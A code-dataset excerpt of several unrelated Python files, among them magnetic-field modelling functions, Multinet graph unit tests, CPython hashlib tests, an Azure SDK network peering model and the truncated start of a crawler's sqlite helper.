code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from SimPEG import Mesh, Utils
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from scipy.sparse import spdiags,csr_matrix, eye,kron,hstack,vstack,eye,diags
import copy
from scipy.constants import mu_0
from SimPEG import SolverLU
from scipy.sparse.linalg import spsolve,splu
from SimPEG.EM import TDEM
from SimPEG.EM.Analytics.TDEM import hzAnalyticDipoleT,hzAnalyticCentLoopT
from scipy.interpolate import interp2d,LinearNDInterpolator
from scipy.special import ellipk,ellipe
def rectangular_plane_layout(mesh,corner, closed = False,I=1.):
"""
corner: sorted list of four corners (x,y,z)
2--3
| |
1--4
y
|
|--> x
Output:
Js
"""
Jx = np.zeros(mesh.nEx)
Jy = np.zeros(mesh.nEy)
Jz = np.zeros(mesh.nEz)
indy1 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEy[:,0]>=corner[0,0],mesh.gridEy[:,0]<=corner[1,0]), \
np.logical_and(mesh.gridEy[:,1] >=corner[0,1] , mesh.gridEy[:,1]<=corner[1,1] )),
(mesh.gridEy[:,2] == corner[0,2]
)
)
indx1 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEx[:,0]>=corner[1,0],mesh.gridEx[:,0]<=corner[2,0]), \
np.logical_and(mesh.gridEx[:,1] >=corner[1,1] , mesh.gridEx[:,1]<=corner[2,1] )),
(mesh.gridEx[:,2] == corner[1,2]
)
)
indy2 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEy[:,0]>=corner[2,0],mesh.gridEy[:,0]<=corner[3,0]), \
np.logical_and(mesh.gridEy[:,1] <=corner[2,1] , mesh.gridEy[:,1]>=corner[3,1] )),
(mesh.gridEy[:,2] == corner[2,2]
)
)
if closed:
indx2 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEx[:,0]>=corner[0,0],mesh.gridEx[:,0]<=corner[3,0]), \
np.logical_and(mesh.gridEx[:,1] >=corner[0,1] , mesh.gridEx[:,1]<=corner[3,1] )),
(mesh.gridEx[:,2] == corner[0,2]
)
)
else:
indx2 = []
Jy[indy1] = -I
Jx[indx1] = -I
Jy[indy2] = I
Jx[indx2] = I
J = np.hstack((Jx,Jy,Jz))
J = J*mesh.edge
return J
def BiotSavart(locs,mesh,Js):
"""
Compute the magnetic field generated by current discretized on a mesh using Biot-Savart law
Input:
locs: observation locations
mesh: mesh on which the current J is discretized
Js: discretized source current in A-m (Finite Volume formulation)
Output:
B: magnetic field [Bx,By,Bz]
"""
c = mu_0/(4*np.pi)
nwire = np.sum(Js!=0.)
ind= np.where(Js!=0.)
ind = ind[0]
B = np.zeros([locs.shape[0],3])
gridE = np.vstack([mesh.gridEx,mesh.gridEy,mesh.gridEz])
for i in range(nwire):
# x wire
if ind[i]<mesh.nEx:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.ones([locs.shape[0],1]),np.zeros([locs.shape[0],1]),np.zeros([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
# y wire
elif ind[i]<mesh.nEx+mesh.nEy:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.zeros([locs.shape[0],1]),np.ones([locs.shape[0],1]),np.zeros([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
# z wire
elif ind[i]<mesh.nEx+mesh.nEy+mesh.nEz:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.zeros([locs.shape[0],1]),np.zeros([locs.shape[0],1]),np.ones([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
else:
print('error: index of J out of bounds (number of edges in the mesh)')
return B
def analytic_infinite_wire(obsloc,wireloc,orientation,I=1.):
"""
Compute the response of an infinite wire with orientation 'orientation'
and current I at the obsvervation locations obsloc
Output:
B: magnetic field [Bx,By,Bz]
"""
n,d = obsloc.shape
t,d = wireloc.shape
d = np.sqrt(np.dot(obsloc**2.,np.ones([d,t]))+np.dot(np.ones([n,d]),(wireloc.T)**2.)
- 2.*np.dot(obsloc,wireloc.T))
distr = np.amin(d, axis=1, keepdims = True)
idxmind = d.argmin(axis=1)
r = obsloc - wireloc[idxmind]
orient = np.c_[[orientation for i in range(obsloc.shape[0])]]
B = (mu_0*I)/(2*np.pi*(distr**2.))*np.cross(orientation,r)
return B
def mag_dipole(m,obsloc):
"""
Compute the response of an infinitesimal mag dipole at location (0,0,0)
with orientation X and magnetic moment 'm'
at the obsvervation locations obsloc
Output:
B: magnetic field [Bx,By,Bz]
"""
loc = np.r_[[[0.,0.,0.]]]
n,d = obsloc.shape
t,d = loc.shape
d = np.sqrt(np.dot(obsloc**2.,np.ones([d,t]))+np.dot(np.ones([n,d]),(loc.T)**2.)
- 2.*np.dot(obsloc,loc.T))
d = d.flatten()
ind = np.where(d==0.)
d[ind] = 1e6
x = obsloc[:,0]
y = obsloc[:,1]
z = obsloc[:,2]
#orient = np.c_[[orientation for i in range(obsloc.shape[0])]]
Bz = (mu_0*m)/(4*np.pi*(d**3.))*(3.*((z**2.)/(d**2.))-1.)
By = (mu_0*m)/(4*np.pi*(d**3.))*(3.*(z*y)/(d**2.))
Bx = (mu_0*m)/(4*np.pi*(d**3.))*(3.*(x*z)/(d**2.))
B = np.vstack([Bx,By,Bz]).T
return B
def circularloop(a,obsloc,I=1.):
"""
From Simpson, Lane, Immer, Youngquist 2001
Compute the magnetic field B response of a current loop
of radius 'a' with intensity 'I'.
input:
a: radius in m
obsloc: obsvervation locations
Output:
B: magnetic field [Bx,By,Bz]
"""
x = np.atleast_2d(obsloc[:,0]).T
y = np.atleast_2d(obsloc[:,1]).T
z = np.atleast_2d(obsloc[:,2]).T
r = np.linalg.norm(obsloc,axis=1)
loc = np.r_[[[0.,0.,0.]]]
n,d = obsloc.shape
r2 = x**2.+y**2.+z**2.
rho2 = x**2.+y**2.
alpha2 = a**2.+r2-2*a*np.sqrt(rho2)
beta2 = a**2.+r2+2*a*np.sqrt(rho2)
k2 = 1-(alpha2/beta2)
lbda = x**2.-y**2.
C = mu_0*I/np.pi
Bx = ((C*x*z)/(2*alpha2*np.sqrt(beta2)*rho2))*\
((a**2.+r2)*ellipe(k2)-alpha2*ellipk(k2))
Bx[np.isnan(Bx)] = 0.
By = ((C*y*z)/(2*alpha2*np.sqrt(beta2)*rho2))*\
((a**2.+r2)*ellipe(k2)-alpha2*ellipk(k2))
By[np.isnan(By)] = 0.
Bz = (C/(2.*alpha2*np.sqrt(beta2)))*\
((a**2.-r2)*ellipe(k2)+alpha2*ellipk(k2))
Bz[np.isnan(Bz)] = 0.
#print(Bx.shape)
#print(By.shape)
#print(Bz.shape)
B = np.hstack([Bx,By,Bz])
return B
| geoscixyz/em_examples | em_examples/Loop.py | Python | mit | 6,800 |
"""
Test the Multinet Class.
"""
import multinet as mn
import networkx as nx
class TestMultinet(object):
def test_build_multinet(self):
"""
Test building Multinet objects.
"""
mg = mn.Multinet()
assert mg.is_directed() == False
mg.add_edge(0, 1, 'L1')
mg.add_edge(0, 1, 'L2')
mg.add_edge(1, 0, 'L2')
mg.add_edge(1, 2, 'L2')
assert 'L1' in mg.layers()
assert 'L2' in mg.layers()
assert len(mg.edgelets) == 3
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 3
# Remove non-existed edge.
mg.remove_edgelet(2, 3, 'L3')
mg.remove_edgelet(0, 1, 'L2')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 2
mg.remove_edgelet(0, 1, 'L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 1
assert len(mg.empty_layers()) == 1
mg.remove_empty_layers()
assert mg.number_of_layers() == 1
def test_aggregate_edge(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['L2'] == 6
mg.add_edge(0, 1, 'L1', weight=10)
assert mg[0][1][mg.cid]['L1'] == 10
mg.aggregate_edge(0, 1, 'L1', weight=5)
assert mg[0][1][mg.cid]['L1'] == 15
mg.aggregate_edge(2, 3, 'L2', weight=7)
assert mg[2][3][mg.cid]['L2'] == 7
def test_sub_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = mg.sub_layer('L1')
assert type(sg) == nx.Graph
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 1
sg = mg.sub_layer('L2', remove_isolates=True)
assert type(sg) == nx.Graph
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
def test_sub_layers(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
sg = mg.sub_layers(['L1', 'L2'])
assert type(sg) == mn.Multinet
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 2
assert sg.number_of_layers() == 2
sg = mg.sub_layers(['L2', 'L3'], remove_isolates=True)
assert type(sg) == mn.Multinet
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
assert sg.number_of_layers() == 2
def test_aggregated(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
ag = mg.aggregated()
assert type(ag) == nx.Graph
assert ag.number_of_nodes() == 3
assert ag.number_of_edges() == 2
assert ag[1][2]['weight'] == 8
assert ag[1][2]['nlayer'] == 2
def test_merge_layers(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L1', 'L2'])
assert 'L1' not in mg.layers()
assert 'L2' not in mg.layers()
assert 'L1_L2' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1_L2'] == 5
assert mg[1][2][mg.cid]['L1_L2'] == 6
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L2', 'L3'], new_name='LN')
assert 'L2' not in mg.layers()
assert 'L3' not in mg.layers()
assert 'LN' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['LN'] == 8
def test_add_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = nx.Graph()
sg.add_edge(1, 2, weight=7)
sg.add_edge(2, 3)
mg.add_layer(sg, 'L3')
assert mg.number_of_nodes() == 4
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
assert mg[1][2][mg.cid]['L2'] == 6
assert mg[1][2][mg.cid]['L3'] == 7
assert mg[2][3][mg.cid]['L3'] == 1
def test_remove_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L3')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
class TestDiMultinet(object):
def test_build_dimultinet(self):
"""
Test building Multinet objects.
"""
mg = mn.DiMultinet()
assert mg.is_directed() == True
mg.add_edge(0, 1, 'L1')
mg.add_edge(0, 1, 'L2')
mg.add_edge(1, 0, 'L2')
mg.add_edge(1, 2, 'L2')
assert 'L1' in mg.layers()
assert 'L2' in mg.layers()
assert len(mg.edgelets) == 4
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 4
# Remove non-existed edge.
mg.remove_edgelet(2, 3, 'L3')
mg.remove_edgelet(0, 1, 'L2')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 3
mg.remove_edgelet(0, 1, 'L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 2
assert len(mg.empty_layers()) == 1
mg.remove_empty_layers()
assert mg.number_of_layers() == 1
def test_aggregate_edge(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['L2'] == 6
mg.add_edge(0, 1, 'L1', weight=10)
assert mg[0][1][mg.cid]['L1'] == 10
mg.aggregate_edge(0, 1, 'L1', weight=5)
assert mg[0][1][mg.cid]['L1'] == 15
mg.aggregate_edge(2, 3, 'L2', weight=7)
assert mg[2][3][mg.cid]['L2'] == 7
def test_sub_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = mg.sub_layer('L1')
assert type(sg) == nx.DiGraph
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 1
sg = mg.sub_layer('L2', remove_isolates=True)
assert type(sg) == nx.DiGraph
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
def test_sub_layers(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
sg = mg.sub_layers(['L1', 'L2'])
assert type(sg) == mn.DiMultinet
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 2
assert sg.number_of_layers() == 2
sg = mg.sub_layers(['L2', 'L3'], remove_isolates=True)
assert type(sg) == mn.DiMultinet
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
assert sg.number_of_layers() == 2
def test_aggregated(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
ag = mg.aggregated()
assert type(ag) == nx.DiGraph
assert ag.number_of_nodes() == 3
assert ag.number_of_edges() == 2
assert ag[1][2]['weight'] == 8
assert ag[1][2]['nlayer'] == 2
def test_merge_layers(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L1', 'L2'])
assert 'L1' not in mg.layers()
assert 'L2' not in mg.layers()
assert 'L1_L2' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1_L2'] == 5
assert mg[1][2][mg.cid]['L1_L2'] == 6
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L2', 'L3'], new_name='LN')
assert 'L2' not in mg.layers()
assert 'L3' not in mg.layers()
assert 'LN' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['LN'] == 8
def test_add_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = nx.Graph()
sg.add_edge(1, 2, weight=7)
sg.add_edge(2, 3)
mg.add_layer(sg, 'L3')
assert mg.number_of_nodes() == 4
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
assert mg[1][2][mg.cid]['L2'] == 6
assert mg[1][2][mg.cid]['L3'] == 7
assert mg[2][3][mg.cid]['L3'] == 1
def test_remove_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L3')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
def test_to_undirected(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(2, 1, 'L3', weight=2)
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
nmg = mg.to_undirected()
assert nmg.number_of_nodes() == 3
assert nmg.number_of_edges() == 2
assert nmg.number_of_layers() == 3
| wuhaochen/multinet | multinet/tests/test_classes.py | Python | mit | 11,570 |
# Test hashlib module
#
# $Id: test_hashlib.py 79216 2010-03-21 19:16:28Z georg.brandl $
#
# Copyright (C) 2005-2010 Gregory P. Smith ([email protected])
# Licensed to PSF under a Contributor Agreement.
#
import hashlib
import unittest
from test import test_support
from test.test_support import _4G, precisionbigmemtest
def hexstr(s):
import string
h = string.hexdigits
r = ''
for c in s:
i = ord(c)
r = r + h[(i >> 4) & 0xF] + h[i & 0xF]
return r
class HashLibTestCase(unittest.TestCase):
supported_hash_names = ( 'md5', 'MD5', 'sha1', 'SHA1',
'sha224', 'SHA224', 'sha256', 'SHA256',
'sha384', 'SHA384', 'sha512', 'SHA512' )
def test_unknown_hash(self):
try:
hashlib.new('spam spam spam spam spam')
except ValueError:
pass
else:
self.assert_(0 == "hashlib didn't reject bogus hash name")
def test_hexdigest(self):
for name in self.supported_hash_names:
h = hashlib.new(name)
self.assert_(hexstr(h.digest()) == h.hexdigest())
def test_large_update(self):
aas = 'a' * 128
bees = 'b' * 127
cees = 'c' * 126
for name in self.supported_hash_names:
m1 = hashlib.new(name)
m1.update(aas)
m1.update(bees)
m1.update(cees)
m2 = hashlib.new(name)
m2.update(aas + bees + cees)
self.assertEqual(m1.digest(), m2.digest())
def check(self, name, data, digest):
# test the direct constructors
computed = getattr(hashlib, name)(data).hexdigest()
self.assert_(computed == digest)
# test the general new() interface
computed = hashlib.new(name, data).hexdigest()
self.assert_(computed == digest)
def test_case_md5_0(self):
self.check('md5', '', 'd41d8cd98f00b204e9800998ecf8427e')
def test_case_md5_1(self):
self.check('md5', 'abc', '900150983cd24fb0d6963f7d28e17f72')
def test_case_md5_2(self):
self.check('md5', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
'd174ab98d277d9f5a5611c2c9f419d9f')
@precisionbigmemtest(size=_4G + 5, memuse=1)
def test_case_md5_huge(self, size):
if size == _4G + 5:
try:
self.check('md5', 'A'*size, 'c9af2dff37468ce5dfee8f2cfc0a9c6d')
except OverflowError:
pass # 32-bit arch
@precisionbigmemtest(size=_4G - 1, memuse=1)
def test_case_md5_uintmax(self, size):
if size == _4G - 1:
try:
self.check('md5', 'A'*size, '28138d306ff1b8281f1a9067e1a1a2b3')
except OverflowError:
pass # 32-bit arch
# use the three examples from Federal Information Processing Standards
# Publication 180-1, Secure Hash Standard, 1995 April 17
# http://www.itl.nist.gov/div897/pubs/fip180-1.htm
def test_case_sha1_0(self):
self.check('sha1', "",
"da39a3ee5e6b4b0d3255bfef95601890afd80709")
def test_case_sha1_1(self):
self.check('sha1', "abc",
"a9993e364706816aba3e25717850c26c9cd0d89d")
def test_case_sha1_2(self):
self.check('sha1', "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"84983e441c3bd26ebaae4aa1f95129e5e54670f1")
def test_case_sha1_3(self):
self.check('sha1', "a" * 1000000,
"34aa973cd4c4daa4f61eeb2bdbad27316534016f")
# use the examples from Federal Information Processing Standards
# Publication 180-2, Secure Hash Standard, 2002 August 1
# http://csrc.nist.gov/publications/fips/fips180-2/fips180-2.pdf
def test_case_sha224_0(self):
self.check('sha224', "",
"d14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f")
def test_case_sha224_1(self):
self.check('sha224', "abc",
"23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7")
def test_case_sha224_2(self):
self.check('sha224',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"75388b16512776cc5dba5da1fd890150b0c6455cb4f58b1952522525")
def test_case_sha224_3(self):
self.check('sha224', "a" * 1000000,
"20794655980c91d8bbb4c1ea97618a4bf03f42581948b2ee4ee7ad67")
def test_case_sha256_0(self):
self.check('sha256', "",
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")
def test_case_sha256_1(self):
self.check('sha256', "abc",
"ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad")
def test_case_sha256_2(self):
self.check('sha256',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1")
def test_case_sha256_3(self):
self.check('sha256', "a" * 1000000,
"cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0")
def test_case_sha384_0(self):
self.check('sha384', "",
"38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da"+
"274edebfe76f65fbd51ad2f14898b95b")
def test_case_sha384_1(self):
self.check('sha384', "abc",
"cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a8b605a43ff5bed"+
"8086072ba1e7cc2358baeca134c825a7")
def test_case_sha384_2(self):
self.check('sha384',
"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmn"+
"hijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu",
"09330c33f71147e83d192fc782cd1b4753111b173b3b05d22fa08086e3b0f712"+
"fcc7c71a557e2db966c3e9fa91746039")
def test_case_sha384_3(self):
self.check('sha384', "a" * 1000000,
"9d0e1809716474cb086e834e310a4a1ced149e9c00f248527972cec5704c2a5b"+
"07b8b3dc38ecc4ebae97ddd87f3d8985")
def test_case_sha512_0(self):
self.check('sha512', "",
"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"+
"47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e")
def test_case_sha512_1(self):
self.check('sha512', "abc",
"ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a"+
"2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f")
def test_case_sha512_2(self):
self.check('sha512',
"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmn"+
"hijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu",
"8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa17299aeadb6889018"+
"501d289e4900f7e4331b99dec4b5433ac7d329eeb6dd26545e96e55b874be909")
def test_case_sha512_3(self):
self.check('sha512', "a" * 1000000,
"e718483d0ce769644e2e42c7bc15b4638e1f98b13b2044285632a803afa973eb"+
"de0ff244877ea60a4cb0432ce577c31beb009c5c2c49aa2e4eadb217ad8cc09b")
def test_main():
test_support.run_unittest(HashLibTestCase)
if __name__ == "__main__":
test_main()
| babyliynfg/cross | tools/project-creator/Python2.6.6/Lib/test/test_hashlib.py | Python | mit | 7,399 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class VirtualNetworkPeering(SubResource):
"""Peerings in a virtual network resource.
:param id: Resource ID.
:type id: str
:param allow_virtual_network_access: Whether the VMs in the linked virtual
network space would be able to access all the VMs in local Virtual network
space.
:type allow_virtual_network_access: bool
:param allow_forwarded_traffic: Whether the forwarded traffic from the VMs
in the remote virtual network will be allowed/disallowed.
:type allow_forwarded_traffic: bool
:param allow_gateway_transit: If gateway links can be used in remote
virtual networking to link to this virtual network.
:type allow_gateway_transit: bool
:param use_remote_gateways: If remote gateways can be used on this virtual
network. If the flag is set to true, and allowGatewayTransit on remote
peering is also true, virtual network will use gateways of remote virtual
network for transit. Only one peering can have this flag set to true. This
flag cannot be set if virtual network already has a gateway.
:type use_remote_gateways: bool
:param remote_virtual_network: The reference of the remote virtual
network. The remote virtual network can be in the same or different region
(preview). See here to register for the preview and learn more
(https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-create-peering).
:type remote_virtual_network:
~azure.mgmt.network.v2017_11_01.models.SubResource
:param remote_address_space: The reference of the remote virtual network
address space.
:type remote_address_space:
~azure.mgmt.network.v2017_11_01.models.AddressSpace
:param peering_state: The status of the virtual network peering. Possible
values are 'Initiated', 'Connected', and 'Disconnected'. Possible values
include: 'Initiated', 'Connected', 'Disconnected'
:type peering_state: str or
~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeeringState
:param provisioning_state: The provisioning state of the resource.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'allow_virtual_network_access': {'key': 'properties.allowVirtualNetworkAccess', 'type': 'bool'},
'allow_forwarded_traffic': {'key': 'properties.allowForwardedTraffic', 'type': 'bool'},
'allow_gateway_transit': {'key': 'properties.allowGatewayTransit', 'type': 'bool'},
'use_remote_gateways': {'key': 'properties.useRemoteGateways', 'type': 'bool'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'remote_address_space': {'key': 'properties.remoteAddressSpace', 'type': 'AddressSpace'},
'peering_state': {'key': 'properties.peeringState', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, allow_virtual_network_access=None, allow_forwarded_traffic=None, allow_gateway_transit=None, use_remote_gateways=None, remote_virtual_network=None, remote_address_space=None, peering_state=None, provisioning_state=None, name=None, etag=None):
super(VirtualNetworkPeering, self).__init__(id=id)
self.allow_virtual_network_access = allow_virtual_network_access
self.allow_forwarded_traffic = allow_forwarded_traffic
self.allow_gateway_transit = allow_gateway_transit
self.use_remote_gateways = use_remote_gateways
self.remote_virtual_network = remote_virtual_network
self.remote_address_space = remote_address_space
self.peering_state = peering_state
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
| AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/virtual_network_peering.py | Python | mit | 4,677 |
# -*- coding: utf-8 -*-
import sys
sys.path.append('../browser_interface/browser')
class BrowserFactory(object):
def create(self, type, *args, **kwargs):
return getattr(__import__(type), type)(*args, **kwargs)
| xtuyaowu/jtyd_python_spider | browser_interface/browser/BrowserFactory.py | Python | mit | 225 |
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
def __init__(self):
'''创建表'''
self.conn = sqlite3.connect("./items.db")
if VERBOSE:
print 'Database connection OPEN.'
# Domain 表
self.conn.execute(CTABLE_DOMAIN)
# Website 表
self.conn.execute(CTABLE_WEBSITE)
# Rule 表
self.conn.execute(CTABLE_RULESETS)
self.conn.commit()
if VERBOSE:
cur = self.conn.cursor()
print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
def close(self):
'''关闭与数据库的连接'''
if VERBOSE:
print 'Database connection CLOSE.'
self.conn.close()
def insertDomain(self, domain, indegree=0, outdegree=0):
'''增加一个域名'''
cur = self.conn.cursor()
